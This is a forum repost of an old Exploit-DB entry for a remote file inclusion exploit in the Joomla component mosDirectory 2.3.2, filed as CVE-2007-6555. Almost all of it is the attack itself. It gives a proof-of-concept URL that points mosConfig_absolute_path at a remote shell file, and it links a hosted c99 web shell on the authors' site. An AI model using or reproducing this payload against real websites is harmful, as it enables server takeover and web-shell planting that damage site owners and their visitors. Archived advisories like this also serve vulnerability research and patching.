Exploit Joomla! Component mosDirectory 2.3.2 - Remote File Inclusion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
4783
Проверка EDB
  1. Пройдено
Автор
SHOCKSHADOW
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2007-6555
Дата публикации
2007-12-24
Код:
--==+=================== Electronic Security Team (www.Yee7.com) =================+==--
--==+          Joomla Component mosDirectory 2.3.2 Remote File Inclusion          +==--
--==+=============================================================================+==--

Software:     Joomla Component mosDirectory 2.3.2
exploit:      Remote File Inclusion [High Risk]
By:           ShockShadow - Electronic Security Team (www.Yee7.com)
Home:         www.Yee7.com
Download:     http://www.box.net/shared/kdp2h6dbe1
txtShell:     http://yee7.com/shells/c99.txt

##############################

==============
Dork: priv8 ;)

PoC:
http://domain.com/joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://shell.txt?
###############################

by: ShockShadow
Thanks to: ArabHacker, Alyahmom, Trojan, Alakrb Almoftres, Qanas Alyahood, Kates-Ye
AND ALL Yee7.com members

# milw0rm.com [2007-12-24]
 
Источник
www.exploit-db.com

Похожие темы